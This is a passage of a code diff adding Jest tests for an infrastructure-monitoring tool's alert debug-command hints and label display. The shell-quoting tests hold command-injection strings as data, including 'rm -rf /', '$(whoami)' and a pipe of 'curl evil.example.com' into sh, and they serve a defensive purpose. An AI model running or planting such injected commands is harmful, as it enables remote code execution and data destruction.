+ *      identifier it interpolates is known, so no `kubectl logs  -n `
+ *      ever reaches a human.
+ *
+ *   3. SHELL-SAFE. Label values are telemetry - an agent, a Prometheus
+ *      scrape, or a user's own oneuptime.captureMetric() call chose
+ *      them - so a value containing shell metacharacters must render as
+ *      an inert argument, not as a second command.
+ */
+
+function getCommandStrings(input: {
+  monitorType: MonitorType;
+  seriesLabels: JSONObject;
+}): Array<string> {
+  return SeriesDebugHints.getDebugCommands(input).map(
+    (command: SeriesDebugCommand) => {
+      return command.command;
+    },
+  );
+}
+
+const KUBERNETES_POD_LABELS: JSONObject = {
+  "resource.k8s.namespace.name": "prod",
+  "resource.k8s.pod.name": "checkout-7d9f-2xk",
+  "resource.k8s.container.name": "app",
+  "resource.k8s.node.name": "ip-10-0-3-14",
+};
+
+describe("SeriesDebugHints", () => {
+  describe("quoteForShell", () => {
+    test("leaves an ordinary object name unquoted so it stays readable", () => {
+      expect(SeriesDebugHints.quoteForShell("checkout-7d9f-2xk")).toBe(
+        "checkout-7d9f-2xk",
+      );
+      expect(SeriesDebugHints.quoteForShell("/var/lib/docker")).toBe(
+        "/var/lib/docker",
+      );
+      expect(SeriesDebugHints.quoteForShell("osd.12")).toBe("osd.12");
+    });
+
+    test("single-quotes anything carrying a shell metacharacter", () => {
+      expect(SeriesDebugHints.quoteForShell("web; rm -rf /")).toBe(
+        "'web; rm -rf /'",
+      );
+      expect(SeriesDebugHints.quoteForShell("a b")).toBe("'a b'");
+      expect(SeriesDebugHints.quoteForShell("$(whoami)")).toBe("'$(whoami)'");
+      expect(SeriesDebugHints.quoteForShell("`id`")).toBe("'`id`'");
+      expect(SeriesDebugHints.quoteForShell("a&&b")).toBe("'a&&b'");
+      expect(SeriesDebugHints.quoteForShell("a|b")).toBe("'a|b'");
+      expect(SeriesDebugHints.quoteForShell("a\nb")).toBe("'a\nb'");
+    });
+
+    test("escapes an embedded single quote without ending the quoting", () => {
+      /*
+       * The close/escape/reopen dance. A naive implementation would
+       * produce 'a'b', which terminates the quoted string early and
+       * leaves `b` as a separate shell word.
+       */
+      expect(SeriesDebugHints.quoteForShell("a'b")).toBe(`'a'\\''b'`);
+    });
+
+    test("a value trying to break out stays inside one argument", () => {
+      const quoted: string = SeriesDebugHints.quoteForShell(
+        `'; curl evil.example.com | sh; echo '`,
+      );
+
+      /*
+       * Every quote in the value is escaped, so the only unescaped
+       * quotes left are the wrapper's own opening and closing pair.
+       */
+      expect(quoted.startsWith("'")).toBe(true);
+      expect(quoted.endsWith("'")).toBe(true);
+      expect(quoted.split(`'\\''`).join("")).not.toContain("''");
+    });
+  });
+
+  describe("Kubernetes", () => {
+    test("names the pod, container and namespace in the first commands", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Kubernetes,
+        seriesLabels: KUBERNETES_POD_LABELS,
+      });
+
+      expect(commands).toContain(
+        "kubectl describe pod checkout-7d9f-2xk -n prod",
+      );
+      expect(commands).toContain(
+        "kubectl logs checkout-7d9f-2xk -c app -n prod --tail=200",
+      );
+      expect(commands).toContain(
+        "kubectl logs checkout-7d9f-2xk -c app -n prod --previous --tail=200",
+      );
+      expect(commands).toContain(
+        "kubectl top pod checkout-7d9f-2xk -n prod --containers",
+      );
+    });
+
+    test("adds node-level commands when the series names a node", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Kubernetes,
+        seriesLabels: KUBERNETES_POD_LABELS,
+      });
+
+      expect(commands).toContain("kubectl describe node ip-10-0-3-14");
+      expect(commands).toContain(
+        "kubectl get pods --all-namespaces --field-selector spec.nodeName=ip-10-0-3-14 -o wide",
+      );
+    });
+
+    test("omits -n rather than guessing when the namespace is unknown", () => {
+      /*
+       * Guessing "default" sends the engineer to the wrong namespace and
+       * returns "not found". Omitting the flag uses their current
+       * context, which is the correct fallback.
+       */
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Kubernetes,
+        seriesLabels: { "resource.k8s.pod.name": "web-1" },
+      });
+
+      expect(commands).toContain("kubectl describe pod web-1");
+      expect(
+        commands.some((command: string) => {
+          return command.includes("-n ");
+        }),
+      ).toBe(false);
+    });
+
+    test("omits -c rather than emitting an empty container flag", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Kubernetes,
+        seriesLabels: {
+          "resource.k8s.pod.name": "web-1",
+          "resource.k8s.namespace.name": "prod",
+        },
+      });
+
+      expect(commands).toContain("kubectl logs web-1 -n prod --tail=200");
+    });
+
+    test("emits nothing at all when no pod, node or workload is named", () => {
+      expect(
+        getCommandStrings({
+          monitorType: MonitorType.Kubernetes,
+          seriesLabels: { "resource.k8s.cluster.name": "prod-eu" },
+        }),
+      ).toEqual([]);
+    });
+
+    test.each([
+      [
+        "resource.k8s.deployment.name",
+        "checkout",
+        "rollout status deployment/checkout",
+      ],
+      [
+        "resource.k8s.statefulset.name",
+        "kafka",
+        "rollout status statefulset/kafka",
+      ],
+      ["resource.k8s.daemonset.name", "fluentd", "describe daemonset fluentd"],
+      ["resource.k8s.job.name", "nightly", "describe job nightly"],
+      ["resource.k8s.hpa.name", "web-hpa", "describe hpa web-hpa"],
+    ])(
+      "%s produces its own object-specific command",
+      (key: string, value: string, expectedFragment: string) => {
+        const commands: Array<string> = getCommandStrings({
+          monitorType: MonitorType.Kubernetes,
+          seriesLabels: { [key]: value },
+        });
+
+        expect(
+          commands.some((command: string) => {
+            return command.includes(expectedFragment);
+          }),
+        ).toBe(true);
+      },
+    );
+
+    test("a hostile pod name cannot become a second command", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Kubernetes,
+        seriesLabels: {
+          "resource.k8s.pod.name": "web; curl evil.example.com | sh",
+          "resource.k8s.namespace.name": "prod",
+        },
+      });
+
+      for (const command of commands) {
+        /*
+         * The dangerous substring may appear, but only INSIDE the single
+         * quotes that make it one inert argument.
+         */
+        if (command.includes("curl evil.example.com")) {
+          expect(command).toContain("'web; curl evil.example.com | sh'");
+        }
+      }
+    });
+  });
+
+  describe("Docker and Podman", () => {
+    test("uses the docker CLI for a Docker monitor", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Docker,
+        seriesLabels: { "resource.container.name": "nginx" },
+      });
+
+      expect(commands).toContain("docker logs --tail 200 nginx");
+      expect(commands).toContain("docker stats --no-stream nginx");
+      expect(commands).toContain("docker top nginx");
+    });
+
+    test("uses the podman CLI for a Podman monitor", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Podman,
+        seriesLabels: { "resource.container.name": "nginx" },
+      });
+
+      expect(commands).toContain("podman logs --tail 200 nginx");
+      expect(
+        commands.every((command: string) => {
+          return !command.startsWith("docker ");
+        }),
+      ).toBe(true);
+    });
+
+    test("surfaces the exit code and OOM flag, which is what the page is about", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Docker,
+        seriesLabels: { "resource.container.name": "nginx" },
+      });
+
+      expect(
+        commands.some((command: string) => {
+          return (
+            command.includes("docker inspect") &&
+            command.includes("OOMKilled") &&
+            command.includes("ExitCode")
+          );
+        }),
+      ).toBe(true);
+    });
+
+    test("emits nothing without a container name", () => {
+      expect(
+        getCommandStrings({
+          monitorType: MonitorType.Docker,
+          seriesLabels: { "resource.container.image.name": "nginx:1.25" },
+        }),
+      ).toEqual([]);
+    });
+  });
+
+  describe("Docker Swarm", () => {
+    test("adds service-level commands on top of the container ones", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.DockerSwarm,
+        seriesLabels: {
+          "container.name": "web.1.abc123",
+          "docker.swarm.service.name": "web",
+        },
+      });
+
+      expect(commands).toContain("docker logs --tail 200 web.1.abc123");
+      expect(commands).toContain("docker service ps web --no-trunc");
+      expect(commands).toContain("docker service logs --tail 200 web");
+    });
+
+    test("reads the unprefixed container.name the swarm agent emits", () => {
+      /*
+       * Unlike Docker/Podman, the docker_stats receiver in the Swarm
+       * agent keeps container identity in DATAPOINT labels, so the key
+       * has no `resource.` prefix.
+       */
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.DockerSwarm,
+        seriesLabels: { "container.name": "web.1.abc123" },
+      });
+
+      expect(commands.length).toBeGreaterThan(0);
+    });
+  });
+
+  describe("Host", () => {
+    test("investigates the mount that actually filled up", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Host,
+        seriesLabels: { mountpoint: "/var", device: "/dev/nvme0n1p2" },
+      });
+
+      expect(commands).toContain("df -h /var && df -i /var");
+      expect(
+        commands.some((command: string) => {
+          return command.includes("du -xh --max-depth=1 /var");
+        }),
+      ).toBe(true);
+      expect(
+        commands.some((command: string) => {
+          return command.includes("iostat -x 1 3 /dev/nvme0n1p2");
+        }),
+      ).toBe(true);
+    });
+
+    test("checks inodes, not just bytes", () => {
+      /*
+       * "df -h says 60%" plus "disk full" errors is the classic inode
+       * exhaustion signature, and it is invisible without df -i.
+       */
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Host,
+        seriesLabels: { mountpoint: "/var" },
+      });
+
+      expect(
+        commands.some((command: string) => {
+          return command.includes("df -i");
+        }),
+      ).toBe(true);
+    });
+
+    test("a mountpoint with a space stays one argument", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Host,
+        seriesLabels: { mountpoint: "/mnt/my volume" },
+      });
+
+      expect(commands[0]).toContain("'/mnt/my volume'");
+    });
+
+    test("a Server monitor gets the same host commands", () => {
+      expect(
+        getCommandStrings({
+          monitorType: MonitorType.Server,
+          seriesLabels: { diskPath: "/var" },
+        }).length,
+      ).toBeGreaterThan(0);
+    });
+
+    test("emits nothing for a host-scalar series with no entity", () => {
+      expect(
+        getCommandStrings({
+          monitorType: MonitorType.Host,
+          seriesLabels: { "host.name": "prod-db-01" },
+        }),
+      ).toEqual([]);
+    });
+  });
+
+  describe("Proxmox and Ceph", () => {
+    test("Proxmox covers both the VM and the LXC spelling of a bare guest id", () => {
+      /*
+       * A hand-built monitor grouped on `vmid` alone does not say
+       * whether the guest is a VM or an LXC container, so both CLIs are
+       * offered - the wrong one just reports no such guest.
+       */
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Proxmox,
+        seriesLabels: { vmid: "100" },
+      });
+
+      expect(commands).toContain("qm status 100 --verbose");
+      expect(commands).toContain("pct status 100");
+    });
+
+    test("Proxmox reads the composite id the shipped templates group by", () => {
+      /*
+       * This is the shape the shipped templates actually produce:
+       * pve-exporter puts identity in one `id` datapoint label, and the
+       * templates group by it. Without parsing it, a Proxmox alert
+       * carried an identity nothing could act on.
+       */
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Proxmox,
+        seriesLabels: { id: "qemu/100" },
+      });
+
+      expect(commands).toContain("qm status 100 --verbose");
+      // A qemu guest is not an LXC container, so pct is not offered.
+      expect(
+        commands.some((command: string) => {
+          return command.startsWith("pct ");
+        }),
+      ).toBe(false);
+    });
+
+    test("Proxmox offers only the LXC CLI for an lxc/ id", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Proxmox,
+        seriesLabels: { id: "lxc/101" },
+      });
+
+      expect(commands).toContain("pct status 101");
+      expect(
+        commands.some((command: string) => {
+          return command.startsWith("qm ");
+        }),
+      ).toBe(false);
+    });
+
+    test("Proxmox prefers the agent's derived pve.type / pve.id over the raw id", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Proxmox,
+        seriesLabels: {
+          id: "qemu/100",
+          "pve.type": "lxc",
+          "pve.id": "101",
+        },
+      });
+
+      expect(commands).toContain("pct status 101");
+    });
+
+    test("Proxmox takes the last segment of a multi-segment storage id", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Proxmox,
+        seriesLabels: { id: "storage/pve1/local-lvm" },
+      });
+
+      expect(commands).toContain("pvesm status --storage local-lvm");
+    });
+
+    test("Proxmox investigates the node named by a node/ id", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Proxmox,
+        seriesLabels: { id: "node/pve1" },
+      });
+
+      expect(commands).toContain("pvecm status");
+      expect(commands).toContain("pvesh get /nodes/pve1/status");
+    });
+
+    test("an unrecognised Proxmox id still gets a first command", () => {
+      /*
+       * Cluster-scoped ids ("cluster/production") and any future id
+       * shape must not leave the alert with nothing to run.
+       */
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Proxmox,
+        seriesLabels: { id: "cluster/production" },
+      });
+
+      expect(commands).toContain("pvesh get /cluster/resources");
+    });
+
+    test("Ceph always starts from health detail", () => {
+      const commands: Array<string> = getCommandStrings({
+        monitorType: MonitorType.Ceph,
+        seriesLabels: { ceph_daemon: "osd.12" },
+      });
+
+      expect(commands[0]).toBe("ceph health detail");
+      expect(commands).toContain("ceph daemon osd.12 status");
+    });
+  });
+
+  describe("types with no universally safe command", () => {
+    test.each([
+      MonitorType.Metrics,
+      MonitorType.IoTDevice,
+      MonitorType.Website,
+      MonitorType.Logs,
+      MonitorType.Traces,
+    ])("%s emits no commands", (monitorType: MonitorType) => {
+      expect(
+        getCommandStrings({
+          monitorType,
+          seriesLabels: { "device.id": "sensor-1", "service.name": "api" },
+        }),
+      ).toEqual([]);
+    });
+
+    test("an undefined monitor type emits no commands", () => {
+      expect(
+        SeriesDebugHints.getDebugCommands({
+          monitorType: undefined,
+          seriesLabels: KUBERNETES_POD_LABELS,
+        }),
+      ).toEqual([]);
+    });
+
+    test("an ungrouped monitor emits no commands", () => {
+      expect(
+        SeriesDebugHints.getDebugCommands({
+          monitorType: MonitorType.Kubernetes,
+          seriesLabels: {},
+        }),
+      ).toEqual([]);
+      expect(
+        SeriesDebugHints.getDebugCommands({
+          monitorType: MonitorType.Kubernetes,
+          seriesLabels: undefined,
+        }),
+      ).toEqual([]);
+    });
+  });
+
+  describe("every emitted command is read-only and complete", () => {
+    const ALL_CASES: Array<{
+      monitorType: MonitorType;
+      seriesLabels: JSONObject;
+    }> = [
+      {
+        monitorType: MonitorType.Kubernetes,
+        seriesLabels: KUBERNETES_POD_LABELS,
+      },
+      {
+        monitorType: MonitorType.Kubernetes,
+        seriesLabels: {
+          "resource.k8s.namespace.name": "prod",
+          "resource.k8s.deployment.name": "checkout",
+          "resource.k8s.statefulset.name": "kafka",
+          "resource.k8s.daemonset.name": "fluentd",
+          "resource.k8s.job.name": "nightly",
+          "resource.k8s.hpa.name": "web-hpa",
+          "resource.k8s.node.name": "ip-10-0-3-14",
+        },
+      },
+      {
+        monitorType: MonitorType.Docker,
+        seriesLabels: { "resource.container.name": "nginx" },
+      },
+      {
+        monitorType: MonitorType.Podman,
+        seriesLabels: { "resource.container.name": "nginx" },
+      },
+      {
+        monitorType: MonitorType.DockerSwarm,
+        seriesLabels: {
+          "container.name": "web.1.abc",
+          "docker.swarm.service.name": "web",
+        },
+      },
+      {
+        monitorType: MonitorType.Host,
+        seriesLabels: {
+          mountpoint: "/var",
+          device: "/dev/sda1",
+          "network.interface": "eth0",
+        },
+      },
+      {
+        monitorType: MonitorType.Proxmox,
+        seriesLabels: { vmid: "100", node: "pve1", storage: "local-lvm" },
+      },
+      {
+        monitorType: MonitorType.Ceph,
+        seriesLabels: { ceph_daemon: "osd.12", pool_id: "3" },
+      },
+    ];
+
+    /*
+     * Verbs that change state. `rollout status` is read-only and must
+     * not be caught by a bare "rollout" match, so the patterns are
+     * deliberately specific.
+     */
+    const MUTATING_PATTERNS: Array<RegExp> = [
+      /\bdelete\b/,
+      /\bapply\b/,
+      /\bpatch\b/,
+      /\bedit\b/,
+      /\bscale\b/,
+      /\bdrain\b/,
+      /\bcordon\b/,
+      /\bevict\b/,
+      /\bexec\b/,
+      /\brollout (undo|restart|pause|resume)\b/,
+      /\b(rm|kill|stop|start|restart|prune|reboot|shutdown)\b/,
+      /\bset\b/,
+      /*
+       * A redirect that WRITES somewhere. `2>/dev/null` is how these
+       * commands stay quiet about unreadable paths and is not a
+       * mutation, so /dev/null is the one permitted target.
+       */
+      />\s*(?!\/dev\/null\b)\S/,
+    ];
+
+    test.each(ALL_CASES)(
+      "$monitorType commands mutate nothing",
+      (testCase: { monitorType: MonitorType; seriesLabels: JSONObject }) => {
+        const commands: Array<string> = getCommandStrings(testCase);
+
+        expect(commands.length).toBeGreaterThan(0);
+
+        for (const command of commands) {
+          for (const pattern of MUTATING_PATTERNS) {
+            expect(command).not.toMatch(pattern);
+          }
+        }
+      },
+    );
+
+    test.each(ALL_CASES)(
+      "$monitorType commands never contain a blank interpolation",
+      (testCase: { monitorType: MonitorType; seriesLabels: JSONObject }) => {
+        for (const command of getCommandStrings(testCase)) {
+          // A half-filled command shows up as a doubled or trailing space.
+          expect(command).not.toMatch(/\s\s/);
+          expect(command.trim()).toBe(command);
+          // ...and as a flag with nothing after it.
+          expect(command).not.toMatch(/(-n|-c)\s*$/);
+        }
+      },
+    );
+
+    test.each(ALL_CASES)(
+      "$monitorType commands each explain what they answer",
+      (testCase: { monitorType: MonitorType; seriesLabels: JSONObject }) => {
+        for (const command of SeriesDebugHints.getDebugCommands(testCase)) {
+          expect(command.purpose.length).toBeGreaterThan(0);
+        }
+      },
+    );
+  });
+
+  describe("buildMarkdownBlock", () => {
+    test("renders the commands as fenced markdown under a heading", () => {
+      const block: string = SeriesDebugHints.buildMarkdownBlock({
+        monitorType: MonitorType.Kubernetes,
+        seriesLabels: KUBERNETES_POD_LABELS,
+      });
+
+      expect(block).toContain("**Start here**");
+      expect(block).toContain("kubectl describe pod checkout-7d9f-2xk -n prod");
+      expect(block).toContain("```");
+    });
+
+    test("caps how many commands land in a notification", () => {
+      const block: string = SeriesDebugHints.buildMarkdownBlock({
+        monitorType: MonitorType.Kubernetes,
+        seriesLabels: KUBERNETES_POD_LABELS,
+        maxCommands: 2,
+      });
+
+      expect(block.split("- ").length - 1).toBe(2);
+    });
+
+    test("is empty when there is nothing to suggest", () => {
+      expect(
+        SeriesDebugHints.buildMarkdownBlock({
+          monitorType: MonitorType.Metrics,
+          seriesLabels: { "service.name": "api" },
+        }),
+      ).toBe("");
+    });
+  });
+});

--- a/Common/Tests/Types/Monitor/SeriesContext/SeriesLabelDisplay.test.ts
+++ b/Common/Tests/Types/Monitor/SeriesContext/SeriesLabelDisplay.test.ts
@@ -1,0 +1,507 @@
+import { JSONObject } from "../../../../Types/JSON";
+import SeriesLabelDisplay, {
+  DisplaySeriesLabel,
+} from "../../../../Types/Monitor/SeriesContext/SeriesLabelDisplay";
+
+/*
+ * SeriesLabelDisplay decides what an on-call engineer reads at the top of
+ * an alert. The behaviours worth pinning down are the ones that used to
+ * be wrong or that are easy to break by accident:
+ *
+ *   - EMPTY VALUES ARE DROPPED, not rendered. A grouped series carries
+ *     every group-by key even when the attribute was missing on the
+ *     samples (MetricSeriesFingerprint preserves it as "" so the
+ *     fingerprint stays stable), so without this the title reads
+ *     "Pod: web-1 - Node: ".
+ *
+ *   - ORDER IS BY IDENTITY, not by key name. A title truncated to three
+ *     labels has to keep the pod and drop the cluster, never the
+ *     other way round.
+ *
+ *   - THE `resource.` PREFIX IS INVISIBLE to the reader. The same
+ *     concept arrives prefixed (OTel resource attribute) or bare
+ *     (datapoint label) depending on the receiver, and both must render
+ *     as "Pod".
+ */
+
+describe("SeriesLabelDisplay", () => {
+  describe("normalizeKey", () => {
+    test("strips the ClickHouse resource. prefix", () => {
+      expect(SeriesLabelDisplay.normalizeKey("resource.k8s.pod.name")).toBe(
+        "k8s.pod.name",
+      );
+    });
+
+    test("leaves a bare datapoint label alone", () => {
+      expect(SeriesLabelDisplay.normalizeKey("mountpoint")).toBe("mountpoint");
+    });
+
+    test("strips only the leading prefix, not an interior occurrence", () => {
+      expect(
+        SeriesLabelDisplay.normalizeKey("resource.custom.resource.name"),
+      ).toBe("custom.resource.name");
+    });
+  });
+
+  describe("getFriendlyLabelName", () => {
+    test.each([
+      ["resource.k8s.pod.name", "Pod"],
+      ["k8s.pod.name", "Pod"],
+      ["resource.k8s.container.name", "Container"],
+      ["resource.k8s.node.name", "Node"],
+      ["resource.k8s.namespace.name", "Namespace"],
+      ["resource.k8s.deployment.name", "Deployment"],
+      ["resource.k8s.hpa.name", "HPA"],
+      ["resource.container.name", "Container"],
+      ["container.name", "Container"],
+      ["mountpoint", "Mount"],
+      ["device", "Device"],
+      ["ceph_daemon", "Ceph Daemon"],
+      ["pool_id", "Pool"],
+      ["device.id", "Device"],
+      ["service.name", "Service"],
+      ["docker.swarm.service.name", "Swarm Service"],
+      ["pve.type", "Object Type"],
+    ])("%s renders as %s", (key: string, expected: string) => {
+      expect(SeriesLabelDisplay.getFriendlyLabelName(key)).toBe(expected);
+    });
+
+    test("an unregistered key is prettified rather than dropped", () => {
+      /*
+       * Custom-code and synthetic monitors choose their own attribute
+       * keys via oneuptime.captureMetric(), so the registry can never be
+       * exhaustive. A user who groups by tenant_id must still get a
+       * readable alert.
+       */
+      expect(SeriesLabelDisplay.getFriendlyLabelName("tenant_id")).toBe(
+        "Tenant Id",
+      );
+      expect(
+        SeriesLabelDisplay.getFriendlyLabelName("resource.my.custom.thing"),
+      ).toBe("My Custom Thing");
+    });
+
+    test("a key that prettifies to nothing falls back to itself", () => {
+      expect(SeriesLabelDisplay.getFriendlyLabelName("...")).toBe("...");
+    });
+  });
+
+  describe("isKnownLabelKey", () => {
+    test("recognises a registered key under either spelling", () => {
+      expect(SeriesLabelDisplay.isKnownLabelKey("resource.k8s.pod.name")).toBe(
+        true,
+      );
+      expect(SeriesLabelDisplay.isKnownLabelKey("k8s.pod.name")).toBe(true);
+    });
+
+    test("recognises a key whose registered name equals its prettified form", () => {
+      /*
+       * The reason this predicate exists at all. `device` prettifies to
+       * "Device", which is also its registered name, so comparing the
+       * returned string against the fallback cannot tell registration
+       * from absence - and a catalog test that did so failed on every
+       * Host and Ceph template.
+       */
+      expect(SeriesLabelDisplay.isKnownLabelKey("device")).toBe(true);
+      expect(SeriesLabelDisplay.isKnownLabelKey("ceph_daemon")).toBe(true);
+    });
+
+    test("does not claim an unregistered key", () => {
+      expect(SeriesLabelDisplay.isKnownLabelKey("tenant_id")).toBe(false);
+    });
+  });
+
+  describe("getLabelPriority", () => {
+    test("container outranks pod, which outranks namespace, node and cluster", () => {
+      const container: number = SeriesLabelDisplay.getLabelPriority(
+        "resource.k8s.container.name",
+      );
+      const pod: number = SeriesLabelDisplay.getLabelPriority(
+        "resource.k8s.pod.name",
+      );
+      const namespace: number = SeriesLabelDisplay.getLabelPriority(
+        "resource.k8s.namespace.name",
+      );
+      const node: number = SeriesLabelDisplay.getLabelPriority(
+        "resource.k8s.node.name",
+      );
+      const cluster: number = SeriesLabelDisplay.getLabelPriority(
+        "resource.k8s.cluster.name",
+      );
+
+      expect(container).toBeLessThan(pod);
+      expect(pod).toBeLessThan(namespace);
+      expect(namespace).toBeLessThan(node);
+      expect(node).toBeLessThan(cluster);
+    });
+
+    test("prefixed and bare spellings of one key rank identically", () => {
+      expect(SeriesLabelDisplay.getLabelPriority("resource.k8s.pod.name")).toBe(
+        SeriesLabelDisplay.getLabelPriority("k8s.pod.name"),
+      );
+    });
+
+    test("an unregistered key sorts after the object it qualifies", () => {
+      expect(SeriesLabelDisplay.getLabelPriority("tenant_id")).toBeGreaterThan(
+        SeriesLabelDisplay.getLabelPriority("resource.k8s.pod.name"),
+      );
+    });
+  });
+
+  describe("getDisplayLabels", () => {
+    test("returns nothing for an absent or empty label map", () => {
+      expect(SeriesLabelDisplay.getDisplayLabels(undefined)).toEqual([]);
+      expect(SeriesLabelDisplay.getDisplayLabels({})).toEqual([]);
+    });
+
+    test("orders by identity, not by key name", () => {
+      const labels: Array<DisplaySeriesLabel> =
+        SeriesLabelDisplay.getDisplayLabels({
+          "resource.k8s.node.name": "ip-10-0-3-14",
+          "resource.k8s.namespace.name": "prod",
+          "resource.k8s.pod.name": "checkout-7d9f-2xk",
+          "resource.k8s.container.name": "app",
+        });
+
+      expect(
+        labels.map((label: DisplaySeriesLabel) => {
+          return label.name;
+        }),
+      ).toEqual(["Container", "Pod", "Namespace", "Node"]);
+    });
+
+    test("drops empty values so a missing attribute never renders blank", () => {
+      /*
+       * This is the exact shape MetricSeriesFingerprint produces when a
+       * grouped attribute was absent from the samples: the key is kept,
+       * the value is "".
+       */
+      const labels: Array<DisplaySeriesLabel> =
+        SeriesLabelDisplay.getDisplayLabels({
+          "resource.k8s.pod.name": "web-1",
+          "resource.k8s.node.name": "",
+        });
+
+      expect(labels).toHaveLength(1);
+      expect(labels[0]!.value).toBe("web-1");
+    });
+
+    test("drops null and undefined values", () => {
+      const labels: Array<DisplaySeriesLabel> =
+        SeriesLabelDisplay.getDisplayLabels({
+          "resource.k8s.pod.name": "web-1",
+          "resource.k8s.node.name": null,
+          "resource.k8s.namespace.name": undefined,
+        } as unknown as JSONObject);
+
+      expect(labels).toHaveLength(1);
+    });
+
+    test("trims whitespace-only values away", () => {
+      const labels: Array<DisplaySeriesLabel> =
+        SeriesLabelDisplay.getDisplayLabels({
+          "resource.k8s.pod.name": "   ",
+        });
+
+      expect(labels).toEqual([]);
+    });
+
+    test("collapses two spellings of the same identity", () => {
+      /*
+       * Ingest stamps several spellings of host identity on the same
+       * row. Rendering "Host: prod-db-01 | Host: prod-db-01" would waste
+       * the title's whole budget on one fact.
+       */
+      const labels: Array<DisplaySeriesLabel> =
+        SeriesLabelDisplay.getDisplayLabels({
+          "resource.host.name": "prod-db-01",
+          "host.name": "prod-db-01",
+          "resource.oneuptime.host.name": "prod-db-01",
+        });
+
+      expect(labels).toHaveLength(1);
+      expect(labels[0]!.name).toBe("Host");
+    });
+
+    test("keeps two labels that share a name but differ in value", () => {
+      const labels: Array<DisplaySeriesLabel> =
+        SeriesLabelDisplay.getDisplayLabels({
+          "resource.k8s.node.name": "node-a",
+          node: "node-b",
+        });
+
+      expect(labels).toHaveLength(2);
+    });
+
+    test("flattens a multi-valued label", () => {
+      const labels: Array<DisplaySeriesLabel> =
+        SeriesLabelDisplay.getDisplayLabels({
+          "resource.k8s.pod.name": ["web-1", "web-2"],
+        });
+
+      expect(labels[0]!.value).toBe("web-1, web-2");
+    });
+
+    test("refuses to dump an object into a label value", () => {
+      const labels: Array<DisplaySeriesLabel> =
+        SeriesLabelDisplay.getDisplayLabels({
+          "resource.k8s.pod.name": { nested: "value" },
+        });
+
+      expect(labels).toEqual([]);
+    });
+
+    test("renders a numeric label value", () => {
+      const labels: Array<DisplaySeriesLabel> =
+        SeriesLabelDisplay.getDisplayLabels({ pool_id: 3 });
+
+      expect(labels[0]!.value).toBe("3");
+    });
+
+    test("ordering is stable for equal-priority keys", () => {
+      const first: Array<DisplaySeriesLabel> =
+        SeriesLabelDisplay.getDisplayLabels({ zebra: "z", alpha: "a" });
+      const second: Array<DisplaySeriesLabel> =
+        SeriesLabelDisplay.getDisplayLabels({ alpha: "a", zebra: "z" });
+
+      expect(
+        first.map((label: DisplaySeriesLabel) => {
+          return label.key;
+        }),
+      ).toEqual(
+        second.map((label: DisplaySeriesLabel) => {
+          return label.key;
+        }),
+      );
+    });
+
+    test("keeps the raw key alongside the friendly name", () => {
+      /*
+       * The UI shows the raw key underneath the friendly name so a user
+       * can paste it into a Group By or a metric filter and look at the
+       * same series themselves.
+       */
+      const labels: Array<DisplaySeriesLabel> =
+        SeriesLabelDisplay.getDisplayLabels({
+          "resource.k8s.pod.name": "web-1",
+        });
+
+      expect(labels[0]!.key).toBe("resource.k8s.pod.name");
+    });
+  });
+
+  describe("buildInlineSummary", () => {
+    test("renders the identity most-specific first", () => {
+      expect(
+        SeriesLabelDisplay.buildInlineSummary({
+          "resource.k8s.namespace.name": "prod",
+          "resource.k8s.pod.name": "checkout-7d9f-2xk",
+        }),
+      ).toBe("Pod: checkout-7d9f-2xk | Namespace: prod");
+    });
+
+    test("caps the number of labels so a title stays scannable", () => {
+      const summary: string = SeriesLabelDisplay.buildInlineSummary({
+        "resource.k8s.container.name": "app",
+        "resource.k8s.pod.name": "checkout-7d9f-2xk",
+        "resource.k8s.namespace.name": "prod",
+        "resource.k8s.node.name": "ip-10-0-3-14",
+        "resource.k8s.cluster.name": "prod-eu",
+      });
+
+      expect(summary.split(" | ")).toHaveLength(3);
+      // The cap keeps the MOST identifying labels, not the first three keys.
+      expect(summary).toContain("Container: app");
+      expect(summary).not.toContain("prod-eu");
+    });
+
+    test("honours an explicit cap", () => {
+      expect(
+        SeriesLabelDisplay.buildInlineSummary(
+          {
+            "resource.k8s.pod.name": "web-1",
+            "resource.k8s.namespace.name": "prod",
+          },
+          { maxLabels: 1 },
+        ),
+      ).toBe("Pod: web-1");
+    });
+
+    test("a cap of zero still renders one label rather than nothing", () => {
+      expect(
+        SeriesLabelDisplay.buildInlineSummary(
+          { "resource.k8s.pod.name": "web-1" },
+          { maxLabels: 0 },
+        ),
+      ).toBe("Pod: web-1");
+    });
+
+    test("is empty when there is no identity", () => {
+      expect(SeriesLabelDisplay.buildInlineSummary(undefined)).toBe("");
+      expect(SeriesLabelDisplay.buildInlineSummary({})).toBe("");
+      expect(
+        SeriesLabelDisplay.buildInlineSummary({
+          "resource.k8s.pod.name": "",
+        }),
+      ).toBe("");
+    });
+
+    test("shortens a value too long for a title column", () => {
+      /*
+       * Kubernetes object names go up to 253 characters. Three of those
+       * would overflow the 500-character title column and fail the alert
+       * INSERT outright - no alert at all, which is far worse than a
+       * shortened name.
+       */
+      const longName: string = `pod-${"x".repeat(200)}-abc123`;
+
+      const summary: string = SeriesLabelDisplay.buildInlineSummary({
+        "resource.k8s.pod.name": longName,
+      });
+
+      expect(summary.length).toBeLessThan(90);
+      expect(summary).toContain("...");
+    });
+
